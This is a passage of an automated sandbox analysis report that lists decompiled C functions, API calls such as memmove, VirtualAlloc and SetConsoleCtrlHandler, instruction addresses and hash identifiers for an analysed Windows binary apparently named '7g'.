                                                                                                                    • Opcode Fuzzy Hash: d55e3e6c8075d2b055aed202a41bfd3888520a218a5eb8808ca88926c2b605c3
                                                                                                                    • Instruction Fuzzy Hash: EDA001702A501A8A8E111B34D8099243AA1AA52A06B2427A4A007CA4B4DE224418EA01
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B4423B Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00B4423B() {
				int _t1;

				_t1 = SetConsoleCtrlHandler(E00B4421B, 0); // executed
				return _t1;
			}




                                                                                                                    0x00b44242
                                                                                                                    0x00b44248

                                                                                                                    APIs
                                                                                                                    • SetConsoleCtrlHandler.KERNELBASE(Function_0003421B,00000000), ref: 00B44242
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ConsoleCtrlHandler
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1513847179-0
                                                                                                                    • Opcode ID: e3b4bb97d772b6675de637cd77471408e0a126662ed50714b25788b1563c060a
                                                                                                                    • Instruction ID: 31f591c25a6d8554b1fa1696c91b30111eac6e833f66a80ca2ddf61f37650f0b
                                                                                                                    • Opcode Fuzzy Hash: e3b4bb97d772b6675de637cd77471408e0a126662ed50714b25788b1563c060a
                                                                                                                    • Instruction Fuzzy Hash: B3A002306D0200A6DD109770AD0AB2439707742B11F3901907103960F04AD11112D655
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B1C130 Relevance: 1.5, APIs: 1, Instructions: 205COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 95%
                                                                                                                    			E00B1C130(intOrPtr _a4, signed int _a7, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a20, intOrPtr* _a24) {
				signed int _v5;
				int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v36;
				char _v40;
				int _v44;
				int _v48;
				signed int _t100;
				signed char _t106;
				intOrPtr* _t107;
				signed int _t109;
				intOrPtr* _t110;
				signed int _t115;
				void* _t120;
				intOrPtr* _t121;
				void* _t124;
				int _t125;
				signed int _t126;
				int _t127;
				void* _t129;
				signed int _t136;
				void* _t140;
				signed int _t143;
				signed int _t150;
				char _t153;
				intOrPtr* _t156;
				void* _t158;
				intOrPtr _t159;
				void* _t160;
				void* _t164;
				void* _t184;

				_t159 = _a4;
				_t100 = L00B1BB87(_t159);
				if(_t100 != 0) {
					L55:
					return _t100;
				} else {
					_a7 = _a7 & 0;
					_v48 = 0;
					_v44 = 0;
					_v40 = 0;
					_v36 = 0;
					_v12 = 0;
					_v16 = 0;
					while(1) {
						L2:
						_t156 = _a20;
						if(_t156 == 0) {
							goto L6;
						}
						L3:
						_t164 = _v36 -  *((intOrPtr*)(_t156 + 4));
						if(_t164 > 0 || _t164 >= 0 && _v40 >=  *_t156) {
							L51:
							return 0;
						}
						L6:
						_v20 = _v20 & 0x00000000;
						if(_a7 != 0) {
							_t125 = _v12;
						} else {
							_t127 = _v12;
							_v24 =  *((intOrPtr*)(_t159 + 0x48)) - _t127;
							_t115 = E00B1FE65(_a8,  *(_t159 + 0x44) + _t127,  &_v24); // executed
							_t125 = _t127 + _v24;
							_v20 = _t115;
							_v12 = _t125;
							_a7 = _t125 !=  *((intOrPtr*)(_t159 + 0x48));
							if(_t115 != 0) {
								_a7 = 1;
							}
						}
						if(_t125 == 0) {
							return _v20;
						} else {
							_v5 = _v5 & 0x00000000;
							if(_t125 == _v16) {
								L26:
								_t126 = _v16;
								if(_v20 != 0) {
									L32:
									_v24 = _t126;
									if(_t156 != 0) {
										_t136 =  *_t156 - _v40;
										asm("sbb eax, [ebp-0x20]");
										_t184 = 0 -  *((intOrPtr*)(_t156 + 4));
										if(_t184 >= 0 && (_t184 > 0 || _t126 > _t136)) {
											_v24 = _t136;
										}
									}
									_t100 = E00B1FED3(_a12,  *(_t159 + 0x44), _v24); // executed
									if(_t100 != 0) {
										goto L55;
									} else {
										_v40 = _v40 + _v24;
										_t100 = _v20;
										asm("adc dword [ebp-0x20], 0x0");
										if(_t100 != 0) {
											goto L55;
										}
										if(_a7 == _t100) {
											L42:
											if(_t126 == 0 || _v16 < _t126) {
												L54:
												return 0x80004005;
											} else {
												L44:
												_v16 = _v16 - _t126;
												_t83 =  &_v12;
												 *_t83 = _v12 - _t126;
												if( *_t83 != 0) {
													memmove( *(_t159 + 0x44),  *(_t159 + 0x44) + _t126, _v12);
													_t160 = _t160 + 0xc;
												}
												if(_a24 == 0) {
													L2:
													_t156 = _a20;
													if(_t156 == 0) {
														goto L6;
													}
													goto L3;
												} else {
													L47:
													_t153 = _v40;
													_t143 = _v36;
													_t120 = _t153 - _v48;
													asm("sbb edi, [ebp-0x28]");
													_v28 = _t143;
													if(_t120 == 0 && _t120 < 0x400000) {
														L49:
														_t121 = _a24;
														_v48 = _t153;
														_v44 = _t143;
														_t100 =  *((intOrPtr*)( *_t121 + 0xc))(_t121,  &_v40,  &_v40);
														if(_t100 != 0) {
															goto L55;
														}
														continue;
													} else {
														continue;
														do {
															do {
																goto L2;
															} while (_a24 == 0);
															goto L47;
														} while (_t120 == 0 && _t120 < 0x400000);
														goto L49;
													}
												}
											}
										}
										if(_v12 == _t126) {
											goto L51;
										}
										if( *((intOrPtr*)(_t159 + 0x54)) == _t100) {
											_t124 = 1;
											return _t124;
										}
										goto L42;
									}
								}
								_t106 = _t126 & 0x000000c0;
								if(_a7 == 0) {
									L31:
									_t126 = _t106;
									goto L32;
								}
								if(_v5 != 0) {
									if( *((char*)(_t159 + 0x54)) == 0) {
										goto L32;
									}
									goto L31;
								}
								_t126 = _v12;
								goto L32;
							} else {
								goto L12;
							}
							while(1) {
								L12:
								_t129 = _v12 - _v16;
								_t107 =  *((intOrPtr*)(_t159 + 0x98));
								_t158 =  *((intOrPtr*)( *_t107 + 0x10))(_t107,  *(_t159 + 0x44) + _v16, _t129);
								if(_t158 == 0) {
									break;
								}
								_t150 = _v16;
								_t109 = _t158 + _t150;
								_v28 = _t109;
								if(_t158 <= _t129) {
									L22:
									_v16 = _t109;
									if(_v12 != _t109) {
										continue;
									}
									break;
								}
								if(_v20 != 0) {
									break;
								}
								if( *((char*)(_t159 + 0x54)) == 0 || _t158 >  *((intOrPtr*)(_t159 + 0x48)) - _t150 || _a7 == 0) {
									_v5 = 1;
									break;
								} else {
									_t140 =  *(_t159 + 0x44);
									do {
										 *(_t140 + _v12) =  *(_t140 + _v12) & 0x00000000;
										_v12 = _v12 + 1;
									} while (_v12 != _t109);
									_t110 =  *((intOrPtr*)(_t159 + 0x98));
									_push(_t158);
									_push(_t140 + _t150);
									_push(_t110);
									if(_t158 !=  *((intOrPtr*)( *_t110 + 0x10))()) {
										goto L54;
									}
									_t109 = _v28;
									goto L22;
								}
							}
							_t156 = _a20;
							goto L26;
						}
					}
				}
			}





































                                                                                                                    0x00b1c138
                                                                                                                    0x00b1c13e
                                                                                                                    0x00b1c147
                                                                                                                    0x00b1c364
                                                                                                                    0x00b1c364
                                                                                                                    0x00b1c14d
                                                                                                                    0x00b1c14d
                                                                                                                    0x00b1c150
                                                                                                                    0x00b1c153
                                                                                                                    0x00b1c156
                                                                                                                    0x00b1c159
                                                                                                                    0x00b1c15c
                                                                                                                    0x00b1c15f
                                                                                                                    0x00b1c162
                                                                                                                    0x00b1c162
                                                                                                                    0x00b1c162
                                                                                                                    0x00b1c167
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b1c169
                                                                                                                    0x00b1c16c
                                                                                                                    0x00b1c16f
                                                                                                                    0x00b1c34d
                                                                                                                    0x00000000
                                                                                                                    0x00b1c34d
                                                                                                                    0x00b1c182
                                                                                                                    0x00b1c182
                                                                                                                    0x00b1c18a
                                                                                                                    0x00b1c1c2
                                                                                                                    0x00b1c18c
                                                                                                                    0x00b1c18f
                                                                                                                    0x00b1c19c
                                                                                                                    0x00b1c1a3
                                                                                                                    0x00b1c1a8
                                                                                                                    0x00b1c1ab
                                                                                                                    0x00b1c1b1
                                                                                                                    0x00b1c1b4
                                                                                                                    0x00b1c1ba
                                                                                                                    0x00b1c1bc
                                                                                                                    0x00b1c1bc
                                                                                                                    0x00b1c1ba
                                                                                                                    0x00b1c1c7
                                                                                                                    0x00000000
                                                                                                                    0x00b1c1cd
                                                                                                                    0x00b1c1cd
                                                                                                                    0x00b1c1d4
                                                                                                                    0x00b1c260
                                                                                                                    0x00b1c260
                                                                                                                    0x00b1c268
                                                                                                                    0x00b1c285
                                                                                                                    0x00b1c287
                                                                                                                    0x00b1c28a
                                                                                                                    0x00b1c291
                                                                                                                    0x00b1c294
                                                                                                                    0x00b1c297
                                                                                                                    0x00b1c299
                                                                                                                    0x00b1c2a1
                                                                                                                    0x00b1c2a1
                                                                                                                    0x00b1c299
                                                                                                                    0x00b1c2ad
                                                                                                                    0x00b1c2b4
                                                                                                                    0x00000000
                                                                                                                    0x00b1c2ba
                                                                                                                    0x00b1c2bd
                                                                                                                    0x00b1c2c0
                                                                                                                    0x00b1c2c3
                                                                                                                    0x00b1c2c9
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b1c2d2
                                                                                                                    0x00b1c2de
                                                                                                                    0x00b1c2e0
                                                                                                                    0x00b1c35b
                                                                                                                    0x00000000
                                                                                                                    0x00b1c2e7
                                                                                                                    0x00b1c2e7
                                                                                                                    0x00b1c2e7
                                                                                                                    0x00b1c2ea
                                                                                                                    0x00b1c2ea
                                                                                                                    0x00b1c2ed
                                                                                                                    0x00b1c2fa
                                                                                                                    0x00b1c300
                                                                                                                    0x00b1c300
                                                                                                                    0x00b1c307
                                                                                                                    0x00b1c162
                                                                                                                    0x00b1c162
                                                                                                                    0x00b1c167
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b1c30d
                                                                                                                    0x00b1c30d
                                                                                                                    0x00b1c30d
                                                                                                                    0x00b1c310
                                                                                                                    0x00b1c317
                                                                                                                    0x00b1c31a
                                                                                                                    0x00b1c31d
                                                                                                                    0x00b1c320
                                                                                                                    0x00b1c32d
                                                                                                                    0x00b1c32d
                                                                                                                    0x00b1c330
                                                                                                                    0x00b1c336
                                                                                                                    0x00b1c341
                                                                                                                    0x00b1c346
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b1c162
                                                                                                                    0x00000000
                                                                                                                    0x00b1c162
                                                                                                                    0x00b1c162
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b1c162
                                                                                                                    0x00000000
                                                                                                                    0x00b1c162
                                                                                                                    0x00b1c320
                                                                                                                    0x00b1c307
                                                                                                                    0x00b1c2e0
                                                                                                                    0x00b1c2d7
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b1c2dc
                                                                                                                    0x00b1c358
                                                                                                                    0x00000000
                                                                                                                    0x00b1c358
                                                                                                                    0x00000000
                                                                                                                    0x00b1c2dc
                                                                                                                    0x00b1c2b4
                                                                                                                    0x00b1c26c
                                                                                                                    0x00b1c271
                                                                                                                    0x00b1c283
                                                                                                                    0x00b1c283
                                                                                                                    0x00000000
                                                                                                                    0x00b1c283
                                                                                                                    0x00b1c276
                                                                                                                    0x00b1c281
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b1c281
                                                                                                                    0x00b1c278
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b1c1da
                                                                                                                    0x00b1c1da
                                                                                                                    0x00b1c1e0
                                                                                                                    0x00b1c1e3
                                                                                                                    0x00b1c1f4
                                                                                                                    0x00b1c1f8
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b1c1fa
                                                                                                                    0x00b1c1ff
                                                                                                                    0x00b1c202
                                                                                                                    0x00b1c205
                                                                                                                    0x00b1c24f
                                                                                                                    0x00b1c252
                                                                                                                    0x00b1c255
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b1c257
                                                                                                                    0x00b1c20b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b1c211
                                                                                                                    0x00b1c259
                                                                                                                    0x00000000
                                                                                                                    0x00b1c222
                                                                                                                    0x00b1c222
                                                                                                                    0x00b1c225
                                                                                                                    0x00b1c228
                                                                                                                    0x00b1c22c
                                                                                                                    0x00b1c22f
                                                                                                                    0x00b1c234
                                                                                                                    0x00b1c23c
                                                                                                                    0x00b1c23d
                                                                                                                    0x00b1c240
                                                                                                                    0x00b1c246
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b1c24c
                                                                                                                    0x00000000
                                                                                                                    0x00b1c24c
                                                                                                                    0x00b1c211
                                                                                                                    0x00b1c25d
                                                                                                                    0x00000000
                                                                                                                    0x00b1c25d
                                                                                                                    0x00b1c1c7
                                                                                                                    0x00b1c162

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2162964266-0
                                                                                                                    • Opcode ID: 26315365cc9eb0a50317752c5c34d1d9d799f0af12cbdeb7f749507608023e9b
                                                                                                                    • Instruction ID: ee8accd00d91e1e76f44117ba0e3ee97dc256bf1e1b240d881162afb0df88ce9
                                                                                                                    • Opcode Fuzzy Hash: 26315365cc9eb0a50317752c5c34d1d9d799f0af12cbdeb7f749507608023e9b
                                                                                                                    • Instruction Fuzzy Hash: 92813771E44249AFCF14CFE8C484AEEBBF1FB49704F5484AAD425A7241D770AE84CB95
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B4EF37 Relevance: 1.3, APIs: 1, Instructions: 35COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _CxxThrowException.MSVCRT(00000000,00B8FFC8), ref: 00B4EF62
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionThrow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 432778473-0
                                                                                                                    • Opcode ID: 25159e7a2341512ea63b099d67c4cb6fa4e3a0bf7828770551475121cc712387
                                                                                                                    • Instruction ID: 2985af51cbefdeefd759c497e0afd89eaa1db5d87bdd30bc8696edcf9094fc76
                                                                                                                    • Opcode Fuzzy Hash: 25159e7a2341512ea63b099d67c4cb6fa4e3a0bf7828770551475121cc712387
                                                                                                                    • Instruction Fuzzy Hash: FDF09072A007059BD720AF69D40175EB7E8EF94371F208A6EF5B8C71D0DAB4E9858790
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B6B426 Relevance: 1.3, APIs: 1, Instructions: 16COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: malloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2803490479-0
                                                                                                                    • Opcode ID: a6b984b86d4025dad8ea2ee7849662fee0dab7662469dbff0492556a120f634b
                                                                                                                    • Instruction ID: e22dcf053d94bad3d774cc5403f031cd7d8c7b437cb0583e91efe5df09b490b4
                                                                                                                    • Opcode Fuzzy Hash: a6b984b86d4025dad8ea2ee7849662fee0dab7662469dbff0492556a120f634b
                                                                                                                    • Instruction Fuzzy Hash: E9D0C9A161260206DF484630585AA7B31E4BF50316B1885F8EC26CA396FF2DC655A254
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B6B383 Relevance: 1.3, APIs: 1, Instructions: 9memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • VirtualAlloc.KERNELBASE(00000000), ref: 00B6B391
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4275171209-0
                                                                                                                    • Opcode ID: 7c3efd993d1132a2bf3d5e82f87e240542ccaf07d6a4c88c0f3b9842a6e200d9
                                                                                                                    • Instruction ID: 704485757ce8ea6579f207e05038cba0dcc69400d60f27fadedba789a02777b9
                                                                                                                    • Opcode Fuzzy Hash: 7c3efd993d1132a2bf3d5e82f87e240542ccaf07d6a4c88c0f3b9842a6e200d9
                                                                                                                    • Instruction Fuzzy Hash: DBC04CE1A4D2909FDF0657109D557603B219B97701F4A10C5E5446B0A2D6551919C722
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B6B290 Relevance: 1.3, APIs: 1, Instructions: 8COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: malloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2803490479-0
                                                                                                                    • Opcode ID: fc3974ee7156d88a15874a07bb157138c58c7db9e955d1ae7471686b0067ec1c
                                                                                                                    • Instruction ID: 32a7909c13e000a63f8757e7da2200ead830a2f0fa478a826c19a7e463db1072
                                                                                                                    • Opcode Fuzzy Hash: fc3974ee7156d88a15874a07bb157138c58c7db9e955d1ae7471686b0067ec1c
                                                                                                                    • Instruction Fuzzy Hash: 6DA024C453100111DD1C33353C1343F15C1115030F7C044FC740DC0111F70DC1441005
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B6B350 Relevance: 1.3, APIs: 1, Instructions: 8COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: malloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2803490479-0
                                                                                                                    • Opcode ID: b838fc036b3e97908aaaa1551be292f48d99c756d65e1e60f81a6ce78553bc12
                                                                                                                    • Instruction ID: 32dfb3866b09901537ea7cccd644fc0877311c42d1a9d317b98f24be26d6ffe2
                                                                                                                    • Opcode Fuzzy Hash: b838fc036b3e97908aaaa1551be292f48d99c756d65e1e60f81a6ce78553bc12
                                                                                                                    • Instruction Fuzzy Hash: 65A002CDE111415299541135284597710E765E06097D8C4F4641980215FB19D5547059
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B6B403 Relevance: 1.3, APIs: 1, Instructions: 6COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00B6B40C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1263568516-0
                                                                                                                    • Opcode ID: 8af0a5ca2aa90384cea209856e1ecbea27ec92e71e6a11d4949615b06cfd6dd4
                                                                                                                    • Instruction ID: 1cc876354562d3eadd1bf5d53802d708cad0f03ace00d3373905908bf0cac757
                                                                                                                    • Opcode Fuzzy Hash: 8af0a5ca2aa90384cea209856e1ecbea27ec92e71e6a11d4949615b06cfd6dd4
                                                                                                                    • Instruction Fuzzy Hash: 08A00278680700B6ED6067306D4FF6937347780F01F34854472467A0E05EE4B044DB1C
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B6B2B0 Relevance: 1.3, APIs: 1, Instructions: 4COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1294909896-0
                                                                                                                    • Opcode ID: a90df977d088e559b5a3ac096065e4e608ea07d1065a4237869f9109acf530e5
                                                                                                                    • Instruction ID: 0561a616732390256798a4db70a13583fa68a3c8d04a3ab1774cca3f6b2540f6
                                                                                                                    • Opcode Fuzzy Hash: a90df977d088e559b5a3ac096065e4e608ea07d1065a4237869f9109acf530e5
                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B6B370 Relevance: 1.3, APIs: 1, Instructions: 4COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1294909896-0
                                                                                                                    • Opcode ID: 6556b2eae512d4ea31c455de01abe10921b699777217d18599bb46ef90935db4
                                                                                                                    • Instruction ID: f9eef3e67c431f16a76a34c093d91be4cbe64b05c06e7c1f6458cf8a1d691ea9
                                                                                                                    • Opcode Fuzzy Hash: 6556b2eae512d4ea31c455de01abe10921b699777217d18599bb46ef90935db4
                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B11E89 Relevance: 1.3, APIs: 1, Instructions: 4COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • free.MSVCRT(?,00B36CD6,00000000,00000000,00000001,?,00B110EB), ref: 00B11E8D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
